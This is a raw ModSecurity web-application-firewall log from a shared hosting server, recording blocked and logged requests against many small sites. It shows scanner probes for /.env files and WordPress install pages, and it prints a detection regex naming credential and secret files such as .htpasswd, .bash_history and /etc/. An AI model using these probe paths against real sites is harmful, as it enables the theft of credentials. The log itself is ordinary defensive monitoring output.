[Tue May 26 15:22:09.101631 2026] [security2:error] [pid 707292:tid 707535] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtSNKAqlRPSIEFAutk2AAAAPY"]
[Tue May 26 15:22:11.161175 2026] [security2:error] [pid 707292:tid 707484] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtStKAqlRPSIEFAutlHQAAAMM"]
[Tue May 26 15:22:12.692178 2026] [security2:error] [pid 707292:tid 707458] [client 72.56.145.241:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVtTNKAqlRPSIEFAutlWgAAAKk"], referer: https://www.anujtradingco.com/
[Tue May 26 15:22:13.088105 2026] [security2:error] [pid 707292:tid 707466] [client 77.232.36.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVtTdKAqlRPSIEFAutlbgAAALE"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1223320&moderation-hash=5fe3946b945a1dadbcfef52c1f70b3fd
[Tue May 26 15:22:13.355442 2026] [security2:error] [pid 707292:tid 707400] [remote 209.38.251.46:36882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.251.38.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVtTdKAqlRPSIEFAutlcQAAp2s"]
[Tue May 26 15:22:13.659809 2026] [security2:error] [pid 707292:tid 707534] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtTdKAqlRPSIEFAutlewAAAPU"]
[Tue May 26 15:22:13.972276 2026] [security2:error] [pid 707292:tid 707425] [client 77.232.36.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVtTdKAqlRPSIEFAutllgAAAIg"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1223320&moderation-hash=5fe3946b945a1dadbcfef52c1f70b3fd
[Tue May 26 15:22:14.062776 2026] [security2:error] [pid 707292:tid 707442] [client 72.56.145.241:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVtTdKAqlRPSIEFAutlngAAAJk"], referer: https://www.anujtradingco.com/pages/services-wide/?unapproved=1264040&moderation-hash=613c331905f28955aee6058749d1f5f3
[Tue May 26 15:22:15.332448 2026] [security2:error] [pid 707292:tid 707423] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtTtKAqlRPSIEFAutltAAAAIY"]
[Tue May 26 15:22:17.677582 2026] [security2:error] [pid 707292:tid 707527] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtUdKAqlRPSIEFAutmAQAAAO4"]
[Tue May 26 15:22:20.260121 2026] [security2:error] [pid 707292:tid 707531] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtU9KAqlRPSIEFAutmTwAAAPI"]
[Tue May 26 15:22:21.549405 2026] [security2:error] [pid 707292:tid 707466] [client 74.7.241.174:35100] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.krishnawoodworks.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVtVdKAqlRPSIEFAutmjQAAsRM"]
[Tue May 26 15:22:21.731791 2026] [security2:error] [pid 707292:tid 707518] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtVdKAqlRPSIEFAutmgwAAAOU"]
[Tue May 26 15:22:23.234825 2026] [security2:error] [pid 707292:tid 707426] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtVtKAqlRPSIEFAutmvwAAAIk"]
[Tue May 26 15:22:24.290108 2026] [security2:error] [pid 707292:tid 707522] [client 176.65.139.235:62660] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.grandconclaveindia.org.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVtWNKAqlRPSIEFAutm6AAAAOk"]
[Tue May 26 15:22:24.643006 2026] [security2:error] [pid 707292:tid 707480] [client 176.65.139.235:62662] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/.env"] [unique_id "ahVtWNKAqlRPSIEFAutm8AAAAL8"]
[Tue May 26 15:22:25.636918 2026] [security2:error] [pid 707292:tid 707484] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtWdKAqlRPSIEFAutnBQAAAMM"]
[Tue May 26 15:22:25.961351 2026] [security2:error] [pid 707292:tid 707497] [client 176.65.139.234:40390] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com.svijaykumar.in"] [uri "/.env"] [unique_id "ahVtWdKAqlRPSIEFAutnIgAAANA"]
[Tue May 26 15:22:26.456607 2026] [security2:error] [pid 707292:tid 707327] [remote 14.194.98.249:41144] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 249.98.194.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVtWtKAqlRPSIEFAutnKgAA1CI"]
[Tue May 26 15:22:27.655956 2026] [security2:error] [pid 707292:tid 707519] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtW9KAqlRPSIEFAutnQgAAAOY"]
[Tue May 26 15:22:28.363559 2026] [security2:error] [pid 707292:tid 707449] [client 176.36.146.80:64224] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 80.146.36.176.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "virgence.com"] [uri "/index.php/contact-2/"] [unique_id "ahVtXNKAqlRPSIEFAutnWwAAAKA"], referer: http://virgence.com/index.php/contact-2/
[Tue May 26 15:22:28.753688 2026] [security2:error] [pid 707292:tid 707434] [client 176.65.139.236:45312] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.bramas.svijaykumar.in"] [uri "/.env"] [unique_id "ahVtXNKAqlRPSIEFAutncgAAAJE"]
[Tue May 26 15:22:28.757927 2026] [security2:error] [pid 707292:tid 707489] [client 176.65.139.229:49164] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "grandconclaveindia.org.in"] [uri "/.env"] [unique_id "ahVtXNKAqlRPSIEFAutncwAAAMg"]
[Tue May 26 15:22:28.761508 2026] [security2:error] [pid 707292:tid 707464] [client 176.65.139.238:64714] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "jailanitradingcompany.com"] [uri "/.env"] [unique_id "ahVtXNKAqlRPSIEFAutndAAAAK8"]
[Tue May 26 15:22:28.780210 2026] [security2:error] [pid 707292:tid 707453] [client 176.65.139.233:25500] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bhavisharchitects.com"] [uri "/.env"] [unique_id "ahVtXNKAqlRPSIEFAutndQAAAKQ"]
[Tue May 26 15:22:29.080333 2026] [security2:error] [pid 707292:tid 707530] [client 176.65.139.236:45318] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bramas.in"] [uri "/.env"] [unique_id "ahVtXdKAqlRPSIEFAutnfwAAAPE"]
[Tue May 26 15:22:29.122456 2026] [security2:error] [pid 707292:tid 707507] [client 179.38.164.137:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtXNKAqlRPSIEFAutnbgAAANo"]
[Tue May 26 15:22:29.866198 2026] [security2:error] [pid 707292:tid 707510] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtXdKAqlRPSIEFAutniwAAAN0"]
[Tue May 26 15:22:30.379788 2026] [security2:error] [pid 707292:tid 707532] [client 114.119.150.168:24299] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/image/cache/catalog/products/Engine%20Mount/DUB391_a0-228x228.jpeg"] [unique_id "ahVtXtKAqlRPSIEFAutnpgAAAPM"], referer: http://glorodavionics.com/image/cache/catalog/products/Engine%20Mount/DUB391_a0-228x228.jpeg
[Tue May 26 15:22:31.939466 2026] [security2:error] [pid 707292:tid 707459] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtX9KAqlRPSIEFAutn1QAAAKo"]
[Tue May 26 15:22:32.158151 2026] [security2:error] [pid 707292:tid 707338] [remote 14.161.17.36:46760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVtX9KAqlRPSIEFAutn5wAArS0"]
[Tue May 26 15:22:33.826411 2026] [security2:error] [pid 707292:tid 707464] [client 91.84.114.45:49603] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "91.84.114.45" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "agsnails.com"] [uri "/wp-comments-post.php"] [unique_id "ahVtYdKAqlRPSIEFAutoKQAAAK8"], referer: https://agsnails.com/fresh-snails/
[Tue May 26 15:22:33.826569 2026] [security2:error] [pid 707292:tid 707464] [client 91.84.114.45:49603] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "agsnails.com"] [uri "/wp-comments-post.php"] [unique_id "ahVtYdKAqlRPSIEFAutoKQAAAK8"], referer: https://agsnails.com/fresh-snails/
[Tue May 26 15:22:34.341847 2026] [security2:error] [pid 707292:tid 707433] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtYdKAqlRPSIEFAutoMgAAAJA"]
[Tue May 26 15:22:36.523254 2026] [security2:error] [pid 707292:tid 707514] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtZNKAqlRPSIEFAutocQAAAOE"]
[Tue May 26 15:22:38.679230 2026] [security2:error] [pid 707292:tid 707432] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtZtKAqlRPSIEFAutoyAAAAI8"]
[Tue May 26 15:22:40.115296 2026] [security2:error] [pid 707292:tid 707490] [client 188.130.129.86:36165] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.129.130.188.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-comments-post.php"] [unique_id "ahVtZ9KAqlRPSIEFAutpIgAAAMk"], referer: https://agsnails.com/fresh-snails/
[Tue May 26 15:22:40.115466 2026] [security2:error] [pid 707292:tid 707490] [client 188.130.129.86:36165] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "agsnails.com"] [uri "/wp-comments-post.php"] [unique_id "ahVtZ9KAqlRPSIEFAutpIgAAAMk"], referer: https://agsnails.com/fresh-snails/
[Tue May 26 15:22:40.158394 2026] [security2:error] [pid 707292:tid 707545] [client 64.31.3.126:50480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 126.3.31.64.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVtZ9KAqlRPSIEFAutpHwAAAQA"], referer: https://www.cagmedya.com
[Tue May 26 15:22:40.786747 2026] [security2:error] [pid 707292:tid 707483] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtaNKAqlRPSIEFAutpNQAAAMI"]
[Tue May 26 15:22:41.757082 2026] [security2:error] [pid 707292:tid 707461] [client 64.31.3.126:10452] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "64.31.3.126" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVtadKAqlRPSIEFAutpcQAAAKw"], referer: https://www.cagmedya.com
[Tue May 26 15:22:42.230431 2026] [security2:error] [pid 707292:tid 707454] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtadKAqlRPSIEFAutpdAAAAKU"]
[Tue May 26 15:22:42.848467 2026] [security2:error] [pid 707292:tid 707535] [client 8.215.24.140:59442] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "eco-green.com.mx"] [uri "/.env"] [unique_id "ahVtatKAqlRPSIEFAutpmAAAAPY"]
[Tue May 26 15:22:42.853683 2026] [security2:error] [pid 707292:tid 707426] [client 64.31.3.126:39883] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "64.31.3.126" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVtatKAqlRPSIEFAutpmQAAAIk"], referer: https://www.cagmedya.com/wp-login.php?action=register
[Tue May 26 15:22:43.098367 2026] [security2:error] [pid 707292:tid 707431] [client 8.215.24.140:59442] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "eco-green.com.mx"] [uri "/dev/.env"] [unique_id "ahVta9KAqlRPSIEFAutpowAAAI4"]
[Tue May 26 15:22:43.348185 2026] [security2:error] [pid 707292:tid 707540] [client 8.215.24.140:59442] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "eco-green.com.mx"] [uri "/api/.env"] [unique_id "ahVta9KAqlRPSIEFAutprQAAAPs"]
[Tue May 26 15:22:43.558549 2026] [security2:error] [pid 707292:tid 707507] [client 185.191.171.5:44218] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/7/"] [unique_id "ahVta9KAqlRPSIEFAutptwAAANo"]
[Tue May 26 15:22:43.558736 2026] [security2:error] [pid 707292:tid 707507] [client 185.191.171.5:44218] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/7/"] [unique_id "ahVta9KAqlRPSIEFAutptwAAANo"]
[Tue May 26 15:22:44.599640 2026] [security2:error] [pid 707292:tid 707524] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtbNKAqlRPSIEFAutp1gAAAOs"]
[Tue May 26 15:22:46.053793 2026] [security2:error] [pid 707292:tid 707491] [client 8.215.24.140:59558] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/wp-admin/install.php"] [unique_id "ahVtbdKAqlRPSIEFAutqBQAAAMo"]
[Tue May 26 15:22:46.324591 2026] [security2:error] [pid 707292:tid 707488] [client 64.233.173.170:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahVtbNKAqlRPSIEFAutp2gAAAMc"]
[Tue May 26 15:22:46.590618 2026] [security2:error] [pid 707292:tid 707541] [client 8.215.24.140:59558] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/wordpres/wp-admin/install.php"] [unique_id "ahVtbtKAqlRPSIEFAutqIwAAAPw"]
[Tue May 26 15:22:46.972544 2026] [security2:error] [pid 707292:tid 707513] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtbtKAqlRPSIEFAutqIgAAAOA"]
[Tue May 26 15:22:48.325014 2026] [security2:error] [pid 707292:tid 707474] [client 8.215.24.140:59633] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/wp-admin/setup-config.php"] [unique_id "ahVtcNKAqlRPSIEFAutqWgAAALk"]
[Tue May 26 15:22:48.737119 2026] [security2:error] [pid 707292:tid 707471] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVtcNKAqlRPSIEFAutqWQAAALY"]
[Tue May 26 15:22:48.850663 2026] [security2:error] [pid 707292:tid 707443] [client 8.215.24.140:59633] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/wordpres/wp-admin/setup-config.php"] [unique_id "ahVtcNKAqlRPSIEFAutqagAAAJo"]
[Tue May 26 15:22:49.447727 2026] [security2:error] [pid 707292:tid 707437] [client 64.31.3.126:28737] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVtb9KAqlRPSIEFAutqQQAAAJQ"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
